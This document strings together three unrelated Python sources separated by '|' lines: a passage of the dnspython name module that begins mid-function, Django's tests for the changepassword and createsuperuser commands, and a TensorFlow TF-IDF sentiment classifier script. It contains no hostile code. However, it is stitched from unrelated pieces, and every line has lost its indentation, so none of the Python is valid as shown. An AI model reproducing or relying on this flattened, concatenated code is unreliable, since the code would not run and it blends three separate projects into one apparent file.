order = 0
nlabels = 0
namereln = NAMERELN_NONE
while l > 0:
l -= 1
l1 -= 1
l2 -= 1
label1 = self.labels[l1].lower()
label2 = other.labels[l2].lower()
if label1 < label2:
order = -1
if nlabels > 0:
namereln = NAMERELN_COMMONANCESTOR
return (namereln, order, nlabels)
elif label1 > label2:
order = 1
if nlabels > 0:
namereln = NAMERELN_COMMONANCESTOR
return (namereln, order, nlabels)
nlabels += 1
order = ldiff
if ldiff < 0:
namereln = NAMERELN_SUPERDOMAIN
elif ldiff > 0:
namereln = NAMERELN_SUBDOMAIN
else:
namereln = NAMERELN_EQUAL
return (namereln, order, nlabels)
def is_subdomain(self, other):
"""Is self a subdomain of other?
The notion of subdomain includes equality.
@rtype: bool
"""
(nr, o, nl) = self.fullcompare(other)
if nr == NAMERELN_SUBDOMAIN or nr == NAMERELN_EQUAL:
return True
return False
def is_superdomain(self, other):
"""Is self a superdomain of other?
The notion of subdomain includes equality.
@rtype: bool
"""
(nr, o, nl) = self.fullcompare(other)
if nr == NAMERELN_SUPERDOMAIN or nr == NAMERELN_EQUAL:
return True
return False
def canonicalize(self):
"""Return a name which is equal to the current name, but is in
DNSSEC canonical form.
@rtype: dns.name.Name object
"""
return Name([x.lower() for x in self.labels])
def __eq__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] == 0
else:
return False
def __ne__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] != 0
else:
return True
def __lt__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] < 0
else:
return NotImplemented
def __le__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] <= 0
else:
return NotImplemented
def __ge__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] >= 0
else:
return NotImplemented
def __gt__(self, other):
if isinstance(other, Name):
return self.fullcompare(other)[1] > 0
else:
return NotImplemented
def __repr__(self):
return '<DNS name ' + self.__str__() + '>'
def __str__(self):
return self.to_text(False)
def to_text(self, omit_final_dot = False):
"""Convert name to text format.
@param omit_final_dot: If True, don't emit the final dot (denoting the
root label) for absolute names. The default is False.
@rtype: string
"""
if len(self.labels) == 0:
return '@'
if len(self.labels) == 1 and self.labels[0] == '':
return '.'
if omit_final_dot and self.is_absolute():
l = self.labels[:-1]
else:
l = self.labels
s = '.'.join(map(_escapify, l))
return s
def to_unicode(self, omit_final_dot = False):
"""Convert name to Unicode text format.
IDN ACE lables are converted to Unicode.
@param omit_final_dot: If True, don't emit the final dot (denoting the
root label) for absolute names. The default is False.
@rtype: string
"""
if len(self.labels) == 0:
return u'@'
if len(self.labels) == 1 and self.labels[0] == '':
return u'.'
if omit_final_dot and self.is_absolute():
l = self.labels[:-1]
else:
l = self.labels
s = u'.'.join([_escapify(encodings.idna.ToUnicode(x), True) for x in l])
return s
def to_digestable(self, origin=None):
"""Convert name to a format suitable for digesting in hashes.
The name is canonicalized and converted to uncompressed wire format.
@param origin: If the name is relative and origin is not None, then
origin will be appended to it.
@type origin: dns.name.Name object
@raises NeedAbsoluteNameOrOrigin: All names in wire format are
absolute. If self is a relative name, then an origin must be supplied;
if it is missing, then this exception is raised
@rtype: string
"""
if not self.is_absolute():
if origin is None or not origin.is_absolute():
raise NeedAbsoluteNameOrOrigin
labels = list(self.labels)
labels.extend(list(origin.labels))
else:
labels = self.labels
dlabels = ["%s%s" % (chr(len(x)), x.lower()) for x in labels]
return ''.join(dlabels)
def to_wire(self, file = None, compress = None, origin = None):
"""Convert name to wire format, possibly compressing it.
@param file: the file where the name is emitted (typically
a cStringIO file). If None, a string containing the wire name
will be returned.
@type file: file or None
@param compress: The compression table. If None (the default) names
will not be compressed.
@type compress: dict
@param origin: If the name is relative and origin is not None, then
origin will be appended to it.
@type origin: dns.name.Name object
@raises NeedAbsoluteNameOrOrigin: All names in wire format are
absolute. If self is a relative name, then an origin must be supplied;
if it is missing, then this exception is raised
"""
if file is None:
file = cStringIO.StringIO()
want_return = True
else:
want_return = False
if not self.is_absolute():
if origin is None or not origin.is_absolute():
raise NeedAbsoluteNameOrOrigin
labels = list(self.labels)
labels.extend(list(origin.labels))
else:
labels = self.labels
i = 0
for label in labels:
n = Name(labels[i:])
i += 1
if not compress is None:
pos = compress.get(n)
else:
pos = None
if not pos is None:
value = 0xc000 + pos
s = struct.pack('!H', value)
file.write(s)
break
else:
if not compress is None and len(n) > 1:
pos = file.tell()
if pos <= 0x3fff:
compress[n] = pos
l = len(label)
file.write(chr(l))
if l > 0:
file.write(label)
if want_return:
return file.getvalue()
def __len__(self):
"""The length of the name (in labels).
@rtype: int
"""
return len(self.labels)
def __getitem__(self, index):
return self.labels[index]
def __getslice__(self, start, stop):
return self.labels[start:stop]
def __add__(self, other):
return self.concatenate(other)
def __sub__(self, other):
return self.relativize(other)
def split(self, depth):
"""Split a name into a prefix and suffix at depth.
@param depth: the number of labels in the suffix
@type depth: int
@raises ValueError: the depth was not >= 0 and <= the length of the
name.
@returns: the tuple (prefix, suffix)
@rtype: tuple
"""
l = len(self.labels)
if depth == 0:
return (self, dns.name.empty)
elif depth == l:
return (dns.name.empty, self)
elif depth < 0 or depth > l:
raise ValueError('depth must be >= 0 and <= the length of the name')
return (Name(self[: -depth]), Name(self[-depth :]))
def concatenate(self, other):
"""Return a new name which is the concatenation of self and other.
@rtype: dns.name.Name object
@raises AbsoluteConcatenation: self is absolute and other is
not the empty name
"""
if self.is_absolute() and len(other) > 0:
raise AbsoluteConcatenation
labels = list(self.labels)
labels.extend(list(other.labels))
return Name(labels)
def relativize(self, origin):
"""If self is a subdomain of origin, return a new name which is self
relative to origin. Otherwise return self.
@rtype: dns.name.Name object
"""
if not origin is None and self.is_subdomain(origin):
return Name(self[: -len(origin)])
else:
return self
def derelativize(self, origin):
"""If self is a relative name, return a new name which is the
concatenation of self and origin. Otherwise return self.
@rtype: dns.name.Name object
"""
if not self.is_absolute():
return self.concatenate(origin)
else:
return self
def choose_relativity(self, origin=None, relativize=True):
"""Return a name with the relativity desired by the caller. If
origin is None, then self is returned. Otherwise, if
relativize is true the name is relativized, and if relativize is
false the name is derelativized.
@rtype: dns.name.Name object
"""
if origin:
if relativize:
return self.relativize(origin)
else:
return self.derelativize(origin)
else:
return self
def parent(self):
"""Return the parent of the name.
@rtype: dns.name.Name object
@raises NoParent: the name is either the root name or the empty name,
and thus has no parent.
"""
if self == root or self == empty:
raise NoParent
return Name(self.labels[1:])
root = Name([''])
empty = Name([])
def from_unicode(text, origin = root):
"""Convert unicode text into a Name object.
Lables are encoded in IDN ACE form.
@rtype: dns.name.Name object
"""
if not isinstance(text, unicode):
raise ValueError("input to from_unicode() must be a unicode string")
if not (origin is None or isinstance(origin, Name)):
raise ValueError("origin must be a Name or None")
labels = []
label = u''
escaping = False
edigits = 0
total = 0
if text == u'@':
text = u''
if text:
if text == u'.':
return Name(['']) # no Unicode "u" on this constant!
for c in text:
if escaping:
if edigits == 0:
if c.isdigit():
total = int(c)
edigits += 1
else:
label += c
escaping = False
else:
if not c.isdigit():
raise BadEscape
total *= 10
total += int(c)
edigits += 1
if edigits == 3:
escaping = False
label += chr(total)
elif c == u'.' or c == u'\u3002' or \
c == u'\uff0e' or c == u'\uff61':
if len(label) == 0:
raise EmptyLabel
labels.append(encodings.idna.ToASCII(label))
label = u''
elif c == u'\\':
escaping = True
edigits = 0
total = 0
else:
label += c
if escaping:
raise BadEscape
if len(label) > 0:
labels.append(encodings.idna.ToASCII(label))
else:
labels.append('')
if (len(labels) == 0 or labels[-1] != '') and not origin is None:
labels.extend(list(origin.labels))
return Name(labels)
def from_text(text, origin = root):
"""Convert text into a Name object.
@rtype: dns.name.Name object
"""
if not isinstance(text, str):
if isinstance(text, unicode) and sys.hexversion >= 0x02030000:
return from_unicode(text, origin)
else:
raise ValueError("input to from_text() must be a string")
if not (origin is None or isinstance(origin, Name)):
raise ValueError("origin must be a Name or None")
labels = []
label = ''
escaping = False
edigits = 0
total = 0
if text == '@':
text = ''
if text:
if text == '.':
return Name([''])
for c in text:
if escaping:
if edigits == 0:
if c.isdigit():
total = int(c)
edigits += 1
else:
label += c
escaping = False
else:
if not c.isdigit():
raise BadEscape
total *= 10
total += int(c)
edigits += 1
if edigits == 3:
escaping = False
label += chr(total)
elif c == '.':
if len(label) == 0:
raise EmptyLabel
labels.append(label)
label = ''
elif c == '\\':
escaping = True
edigits = 0
total = 0
else:
label += c
if escaping:
raise BadEscape
if len(label) > 0:
labels.append(label)
else:
labels.append('')
if (len(labels) == 0 or labels[-1] != '') and not origin is None:
labels.extend(list(origin.labels))
return Name(labels)
def from_wire(message, current):
"""Convert possibly compressed wire format into a Name.
@param message: the entire DNS message
@type message: string
@param current: the offset of the beginning of the name from the start
of the message
@type current: int
@raises dns.name.BadPointer: a compression pointer did not point backwards
in the message
@raises dns.name.BadLabelType: an invalid label type was encountered.
@returns: a tuple consisting of the name that was read and the number
of bytes of the wire format message which were consumed reading it
@rtype: (dns.name.Name object, int) tuple
"""
if not isinstance(message, str):
raise ValueError("input to from_wire() must be a byte string")
message = dns.wiredata.maybe_wrap(message)
labels = []
biggest_pointer = current
hops = 0
count = ord(message[current])
current += 1
cused = 1
while count != 0:
if count < 64:
labels.append(message[current : current + count].unwrap())
current += count
if hops == 0:
cused += count
elif count >= 192:
current = (count & 0x3f) * 256 + ord(message[current])
if hops == 0:
cused += 1
if current >= biggest_pointer:
raise BadPointer
biggest_pointer = current
hops += 1
else:
raise BadLabelType
count = ord(message[current])
current += 1
if hops == 0:
cused += 1
labels.append('')
return (Name(labels), cused)
|
|
import builtins
import sys
from datetime import date
from io import StringIO
from unittest import mock
from django.apps import apps
from django.contrib.auth import management
from django.contrib.auth.management import create_permissions
from django.contrib.auth.management.commands import (
changepassword, createsuperuser,
)
from django.contrib.auth.models import Group, Permission, User
from django.contrib.contenttypes.models import ContentType
from django.core.management import call_command
from django.core.management.base import CommandError
from django.db import migrations
from django.test import TestCase, override_settings
from django.utils.translation import ugettext_lazy as _
from .models import (
CustomUser, CustomUserNonUniqueUsername, CustomUserWithFK, Email,
)
def mock_inputs(inputs):
"""
Decorator to temporarily replace input/getpass to allow interactive
createsuperuser.
"""
def inner(test_func):
def wrapped(*args):
class mock_getpass:
@staticmethod
def getpass(prompt=b'Password: ', stream=None):
if callable(inputs['password']):
return inputs['password']()
return inputs['password']
def mock_input(prompt):
assert '__proxy__' not in prompt
response = ''
for key, val in inputs.items():
if key in prompt.lower():
response = val
break
return response
old_getpass = createsuperuser.getpass
old_input = builtins.input
createsuperuser.getpass = mock_getpass
builtins.input = mock_input
try:
test_func(*args)
finally:
createsuperuser.getpass = old_getpass
builtins.input = old_input
return wrapped
return inner
class MockTTY:
"""
A fake stdin object that pretends to be a TTY to be used in conjunction
with mock_inputs.
"""
def isatty(self):
return True
class GetDefaultUsernameTestCase(TestCase):
def setUp(self):
self.old_get_system_username = management.get_system_username
def tearDown(self):
management.get_system_username = self.old_get_system_username
def test_actual_implementation(self):
self.assertIsInstance(management.get_system_username(), str)
def test_simple(self):
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), 'joe')
def test_existing(self):
User.objects.create(username='joe')
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), '')
self.assertEqual(
management.get_default_username(check_db=False), 'joe')
def test_i18n(self):
# 'Julia' with accented 'u':
management.get_system_username = lambda: 'J\xfalia'
self.assertEqual(management.get_default_username(), 'julia')
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'},
])
class ChangepasswordManagementCommandTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='joe', password='qwerty')
self.stdout = StringIO()
self.stderr = StringIO()
def tearDown(self):
self.stdout.close()
self.stderr.close()
@mock.patch.object(changepassword.Command, '_get_pass', return_value='not qwerty')
def test_that_changepassword_command_changes_joes_password(self, mock_get_pass):
"Executing the changepassword management command should change joe's password"
self.assertTrue(self.user.check_password('qwerty'))
call_command('changepassword', username='joe', stdout=self.stdout)
command_output = self.stdout.getvalue().strip()
self.assertEqual(
command_output,
"Changing password for user 'joe'\nPassword changed successfully for user 'joe'"
)
self.assertTrue(User.objects.get(username="joe").check_password("not qwerty"))
@mock.patch.object(changepassword.Command, '_get_pass', side_effect=lambda *args: str(args))
def test_that_max_tries_exits_1(self, mock_get_pass):
"""
A CommandError should be thrown by handle() if the user enters in
mismatched passwords three times.
"""
with self.assertRaises(CommandError):
call_command('changepassword', username='joe', stdout=self.stdout, stderr=self.stderr)
@mock.patch.object(changepassword.Command, '_get_pass', return_value='1234567890')
def test_password_validation(self, mock_get_pass):
"""
A CommandError should be raised if the user enters in passwords which
fail validation three times.
"""
abort_msg = "Aborting password change for user 'joe' after 3 attempts"
with self.assertRaisesMessage(CommandError, abort_msg):
call_command('changepassword', username='joe', stdout=self.stdout, stderr=self.stderr)
self.assertIn('This password is entirely numeric.', self.stderr.getvalue())
@mock.patch.object(changepassword.Command, '_get_pass', return_value='not qwerty')
def test_that_changepassword_command_works_with_nonascii_output(self, mock_get_pass):
"""
#21627 -- Executing the changepassword management command should allow
non-ASCII characters from the User object representation.
"""
# 'Julia' with accented 'u':
User.objects.create_user(username='J\xfalia', password='qwerty')
call_command('changepassword', username='J\xfalia', stdout=self.stdout)
class MultiDBChangepasswordManagementCommandTestCase(TestCase):
multi_db = True
@mock.patch.object(changepassword.Command, '_get_pass', return_value='not qwerty')
def test_that_changepassword_command_with_database_option_uses_given_db(self, mock_get_pass):
"""
changepassword --database should operate on the specified DB.
"""
user = User.objects.db_manager('other').create_user(username='joe', password='qwerty')
self.assertTrue(user.check_password('qwerty'))
out = StringIO()
call_command('changepassword', username='joe', database='other', stdout=out)
command_output = out.getvalue().strip()
self.assertEqual(
command_output,
"Changing password for user 'joe'\nPassword changed successfully for user 'joe'"
)
self.assertTrue(User.objects.using('other').get(username="joe").check_password('not qwerty'))
@override_settings(
SILENCED_SYSTEM_CHECKS=['fields.W342'], # ForeignKey(unique=True)
AUTH_PASSWORD_VALIDATORS=[{'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}],
)
class CreatesuperuserManagementCommandTestCase(TestCase):
def test_basic_usage(self):
"Check the operation of the createsuperuser management command"
# We can use the management command to create a superuser
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe",
email="[email protected]",
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = User.objects.get(username="joe")
self.assertEqual(u.email, '[email protected]')
# created password should be unusable
self.assertFalse(u.has_usable_password())
@mock_inputs({
'password': "nopasswd",
'u\u017eivatel': 'foo', # username (cz)
'email': '[email protected]'})
def test_non_ascii_verbose_name(self):
username_field = User._meta.get_field('username')
old_verbose_name = username_field.verbose_name
username_field.verbose_name = _('u\u017eivatel')
new_io = StringIO()
try:
call_command(
"createsuperuser",
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
finally:
username_field.verbose_name = old_verbose_name
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
def test_verbosity_zero(self):
# We can suppress output on the management command
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe2",
email="[email protected]",
verbosity=0,
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, '')
u = User.objects.get(username="joe2")
self.assertEqual(u.email, '[email protected]')
self.assertFalse(u.has_usable_password())
def test_email_in_username(self):
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
username="[email protected]",
email="[email protected]",
stdout=new_io
)
u = User._default_manager.get(username="[email protected]")
self.assertEqual(u.email, '[email protected]')
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUser')
def test_swappable_user(self):
"A superuser can be created when a custom user model is in use"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
email="[email protected]",
date_of_birth="1976-04-01",
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUser._default_manager.get(email="[email protected]")
self.assertEqual(u.date_of_birth, date(1976, 4, 1))
# created password should be unusable
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUser')
def test_swappable_user_missing_required_field(self):
"A Custom superuser won't be created when a required field isn't provided"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = StringIO()
with self.assertRaises(CommandError):
call_command(
"createsuperuser",
interactive=False,
username="[email protected]",
stdout=new_io,
stderr=new_io,
)
self.assertEqual(CustomUser._default_manager.count(), 0)
@override_settings(
AUTH_USER_MODEL='auth_tests.CustomUserNonUniqueUsername',
AUTHENTICATION_BACKENDS=['my.custom.backend'],
)
def test_swappable_user_username_non_unique(self):
@mock_inputs({
'username': 'joe',
'password': 'nopasswd',
})
def createsuperuser():
new_io = StringIO()
call_command(
"createsuperuser",
interactive=True,
email="[email protected]",
stdout=new_io,
stdin=MockTTY(),
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
for i in range(2):
createsuperuser()
users = CustomUserNonUniqueUsername.objects.filter(username="joe")
self.assertEqual(users.count(), 2)
def test_skip_if_not_in_TTY(self):
"""
If the command is not called from a TTY, it should be skipped and a
message should be displayed (#7423).
"""
class FakeStdin:
"""A fake stdin object that has isatty() return False."""
def isatty(self):
return False
out = StringIO()
call_command(
"createsuperuser",
stdin=FakeStdin(),
stdout=out,
interactive=True,
)
self.assertEqual(User._default_manager.count(), 0)
self.assertIn("Superuser creation skipped", out.getvalue())
def test_passing_stdin(self):
"""
You can pass a stdin object as an option and it should be
available on self.stdin.
If no such option is passed, it defaults to sys.stdin.
"""
sentinel = object()
command = createsuperuser.Command()
call_command(
command,
stdin=sentinel,
stdout=StringIO(),
stderr=StringIO(),
interactive=False,
verbosity=0,
username='janet',
email='[email protected]',
)
self.assertIs(command.stdin, sentinel)
command = createsuperuser.Command()
call_command(
command,
stdout=StringIO(),
stderr=StringIO(),
interactive=False,
verbosity=0,
username='joe',
email='[email protected]',
)
self.assertIs(command.stdin, sys.stdin)
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUserWithFK')
def test_fields_with_fk(self):
new_io = StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='[email protected]')
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=email.email,
group=group.pk,
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
non_existent_email = '[email protected]'
msg = 'email instance with email %r does not exist.' % non_existent_email
with self.assertRaisesMessage(CommandError, msg):
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=non_existent_email,
stdout=new_io,
)
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUserWithFK')
def test_fields_with_fk_interactive(self):
new_io = StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='[email protected]')
@mock_inputs({
'password': 'nopasswd',
'username (email.id)': email.pk,
'email (email.email)': email.email,
'group (group.id)': group.pk,
})
def test(self):
call_command(
'createsuperuser',
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
test(self)
def test_password_validation(self):
"""
Creation should fail if the password fails validation.
"""
new_io = StringIO()
# Returns '1234567890' the first two times it is called, then
# 'password' subsequently.
def bad_then_good_password(index=[0]):
index[0] += 1
if index[0] <= 2:
return '1234567890'
return 'password'
@mock_inputs({
'password': bad_then_good_password,
'username': 'joe1234567890',
})
def test(self):
call_command(
"createsuperuser",
interactive=True,
stdin=MockTTY(),
stdout=new_io,
stderr=new_io,
)
self.assertEqual(
new_io.getvalue().strip(),
"This password is entirely numeric.\n"
"Superuser created successfully."
)
test(self)
def test_validation_mismatched_passwords(self):
"""
Creation should fail if the user enters mismatched passwords.
"""
new_io = StringIO()
# The first two passwords do not match, but the second two do match and
# are valid.
entered_passwords = ["password", "not password", "password2", "password2"]
def mismatched_passwords_then_matched():
return entered_passwords.pop(0)
@mock_inputs({
'password': mismatched_passwords_then_matched,
'username': 'joe1234567890',
})
def test(self):
call_command(
"createsuperuser",
interactive=True,
stdin=MockTTY(),
stdout=new_io,
stderr=new_io,
)
self.assertEqual(
new_io.getvalue().strip(),
"Error: Your passwords didn't match.\n"
"Superuser created successfully."
)
test(self)
def test_validation_blank_password_entered(self):
"""
Creation should fail if the user enters blank passwords.
"""
new_io = StringIO()
# The first two passwords are empty strings, but the second two are
# valid.
entered_passwords = ["", "", "password2", "password2"]
def blank_passwords_then_valid():
return entered_passwords.pop(0)
@mock_inputs({
'password': blank_passwords_then_valid,
'username': 'joe1234567890',
})
def test(self):
call_command(
"createsuperuser",
interactive=True,
stdin=MockTTY(),
stdout=new_io,
stderr=new_io,
)
self.assertEqual(
new_io.getvalue().strip(),
"Error: Blank passwords aren't allowed.\n"
"Superuser created successfully."
)
test(self)
class MultiDBCreatesuperuserTestCase(TestCase):
multi_db = True
def test_createsuperuser_command_with_database_option(self):
"""
changepassword --database should operate on the specified DB.
"""
new_io = StringIO()
call_command(
'createsuperuser',
interactive=False,
username='joe',
email='[email protected]',
database='other',
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
user = User.objects.using('other').get(username='joe')
self.assertEqual(user.email, '[email protected]')
class CreatePermissionsTests(TestCase):
def setUp(self):
self._original_permissions = Permission._meta.permissions[:]
self._original_default_permissions = Permission._meta.default_permissions
self.app_config = apps.get_app_config('auth')
def tearDown(self):
Permission._meta.permissions = self._original_permissions
Permission._meta.default_permissions = self._original_default_permissions
ContentType.objects.clear_cache()
def test_default_permissions(self):
permission_content_type = ContentType.objects.get_by_natural_key('auth', 'permission')
Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
]
create_permissions(self.app_config, verbosity=0)
# add/change/delete permission by default + custom permission
self.assertEqual(Permission.objects.filter(
content_type=permission_content_type,
).count(), 4)
Permission.objects.filter(content_type=permission_content_type).delete()
Permission._meta.default_permissions = []
create_permissions(self.app_config, verbosity=0)
# custom permission only since default permissions is empty
self.assertEqual(Permission.objects.filter(
content_type=permission_content_type,
).count(), 1)
def test_unavailable_models(self):
"""
#24075 - Permissions shouldn't be created or deleted if the ContentType
or Permission models aren't available.
"""
state = migrations.state.ProjectState()
# Unavailable contenttypes.ContentType
with self.assertNumQueries(0):
create_permissions(self.app_config, verbosity=0, apps=state.apps)
# Unavailable auth.Permission
state = migrations.state.ProjectState(real_apps=['contenttypes'])
with self.assertNumQueries(0):
create_permissions(self.app_config, verbosity=0, apps=state.apps)
|
|
from __future__ import print_function
import tensorflow as tf
import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer, TfidfTransformer
import math
import itertools
from collections import Counter
from sklearn.metrics import auc, roc_auc_score
import matplotlib.pyplot as plt
MAX_FEAT = 7000
NUM_CLASSES = 1
LEARNING_RATE = 2
TRAIN_STEPS = 150
BATCH_SIZE = 1000
TEMP_SIZE = 5000
NGRAM = 3
BETA_INIT = 1e-5
BETA_STEPS = 1
MAX_FEAT *= NGRAM
train_data = pd.read_csv("Clean_train.csv", quoting=3, header=0)
validation_data = pd.read_csv("Clean_validation.csv", quoting=3, header=0)
# Copy the results to a pandas dataframe with an "id" column and
# a "sentiment" column
test_data = pd.read_csv("Clean_test.csv", quoting=3, header=0)
TEST_SIZE = len(test_data['sentiment'])
TRAIN_SIZE = len(train_data['sentiment'])
VALIDATION_SIZE = len(validation_data['sentiment'])
#print(validation_data)
# vectorizer = CountVectorizer(analyzer = "word", \
# tokenizer = None, \
# preprocessor = None, \
# stop_words = None, \
# ngram_range=(1, NGRAM), \
# max_features = MAX_FEAT)
vectorizer = TfidfVectorizer(analyzer = "word", \
tokenizer = None, \
preprocessor = None, \
stop_words = None, \
ngram_range=(1, NGRAM), \
max_features = MAX_FEAT)
#transformer = TfidfTransformer(smooth_idf=False)
x_train_raw = vectorizer.fit_transform(train_data['reviews'])
#x_train_raw = transformer.fit_transform(x_train_raw)
x_train = x_train_raw.toarray()
# train_data['asentiment'] = 1 - train_data['sentiment']
y_train = np.reshape(train_data['sentiment'].values, (TRAIN_SIZE, NUM_CLASSES))
# y_train = np.reshape(train_data[['sentiment', 'asentiment']].values, (TRAIN_SIZE, NUM_CLASSES))
x_validation_raw = vectorizer.transform(validation_data['reviews'])
#x_validation_raw = transformer.fit_transform(x_validation_raw)
x_validation = x_validation_raw.toarray()
# validation_data['asentiment'] = 1 - validation_data['sentiment']
y_validation = np.reshape(validation_data['sentiment'].values, (VALIDATION_SIZE, NUM_CLASSES))
# y_validation = np.reshape(validation_data[['sentiment', 'asentiment']].values, (validation_SIZE, NUM_CLASSES))
# print(test_data['id'].shape)
x_test_raw = vectorizer.transform(test_data['reviews'])
x_test = x_test_raw.toarray()
y_test = np.reshape(test_data['sentiment'].values, (TEST_SIZE, NUM_CLASSES))
vocab = vectorizer.get_feature_names()
print(x_train.shape, y_train.shape)
print(x_validation.shape, y_validation.shape)
sess = None
def ResetSession():
tf.reset_default_graph()
global sess
if sess is not None: sess.close()
sess = tf.InteractiveSession()
ResetSession()
x = tf.placeholder(tf.float32, [None, MAX_FEAT], name='x')
y = tf.placeholder(tf.float32, [None, NUM_CLASSES], name='y_label')
beta = tf.placeholder(tf.float32, name='beta')
def weight_variable(inputs, outputs, name):
# Random small values
initial = tf.truncated_normal(shape=[inputs, outputs], stddev=1.0 / math.sqrt(float(inputs)))
return tf.Variable(initial, name=name)
def bias_variable(shape, name):
initial = tf.constant(0.0, shape=[shape])
return tf.Variable(initial, name=name)
def batch_iter(data, batch_size, num_epochs, shuffle=True):
# Generates a batch iterator for a dataset.
data = np.array(data)
data_size = len(data)
num_batches_per_epoch = int((len(data)-1)/batch_size) + 1
for epoch in range(num_epochs):
# Shuffle the data at each epoch
if shuffle:
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
else:
shuffled_data = data
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index]
W = weight_variable(MAX_FEAT, NUM_CLASSES, 'weights')
b = bias_variable(NUM_CLASSES, name='bias')
h = tf.matmul(x, W) + b
h_sig = tf.sigmoid(h)
# loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=h, labels=y))
regularizer = tf.nn.l2_loss(W)
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=h, labels=y) + beta * regularizer)
# train_step = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(loss)
train_step = tf.train.AdamOptimizer(4e-3).minimize(loss)
h_class = tf.cast((h_sig > 0.5), tf.float32)
prediction = tf.equal((h_sig > 0.5), tf.cast(y, tf.bool))
accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))
init_g = tf.global_variables_initializer()
#i_lst = []
# j_beta = BETA_INIT
j_beta = 0;
mult = 2
j_tr_loss = []
j_vl_loss = []
j_beta_lst = []
for j in range(BETA_STEPS):
tr_loss_lst = []
ts_loss_lst = []
sess.run(init_g)
i = 0
avg_loss = 0
batches = batch_iter(zip(x_train, y_train), BATCH_SIZE, TRAIN_STEPS)
for batch in batches:
x_batch, y_batch = zip(*batch)
#i_lst.append(i)
i_loss, _ = sess.run([loss, train_step], feed_dict={x: x_batch, y: y_batch, beta: j_beta})
avg_loss += i_loss
if i % 10 == 0:
# print(int((i * 10) / TRAIN_STEPS), i_loss)
tr_loss_lst.append(avg_loss/10)
avg_loss = 0
ts_loss_lst.append(sess.run(loss, feed_dict={x: x_validation, y: y_validation, beta: 0}))
if i % 100 == 0:
print("Train accuracy %f" % sess.run(accuracy, feed_dict={x: x_train, y: y_train}))
# sess.run(init_l)
exh, exy = sess.run([h_sig, y], feed_dict={x: x_batch, y: y_batch})
print("Train AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
i += 1
print("%d, beta %f" % (j, j_beta))
j_beta_lst.append(j_beta)
print("Train accuracy %f" % sess.run(accuracy, feed_dict={x: x_train, y: y_train}))
exh, exy, j_loss = sess.run([h_sig, y, loss], feed_dict={x: x_train, y: y_train, beta: 0})
j_tr_loss.append(j_loss)
# print(exh)
print("Train AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
print("Validation accuracy %f" % sess.run(accuracy, feed_dict={x: x_validation, y: y_validation}))
exh, exy, j_loss = sess.run([h_sig, y, loss], feed_dict={x: x_validation, y: y_validation, beta: 0})
j_vl_loss.append(j_loss)
print("Validation AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
j_beta *= mult
# print(x_test)
# result, _ = sess.run([h_sig, h], feed_dict={x: x_test})
print("Test accuracy %f" % sess.run(accuracy, feed_dict={x: x_test, y: y_test}))
exh, exy = sess.run([h_sig, y], feed_dict={x: x_test, y: y_test, beta: 0})
print("Test AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
# print(result)
# output = pd.DataFrame( data={"sentiment":result[:,0]} )
# Use pandas to write the comma-separated output file
# output.to_csv( "result.csv", index=False, quoting=3 )
# Plot loss and validation accuracy
plt.plot(tr_loss_lst, 'b')
plt.plot(ts_loss_lst, 'g')
# Plot train and validation loss vs regularization parameter
# plt.plot(j_beta_lst, j_tr_loss, 'b')
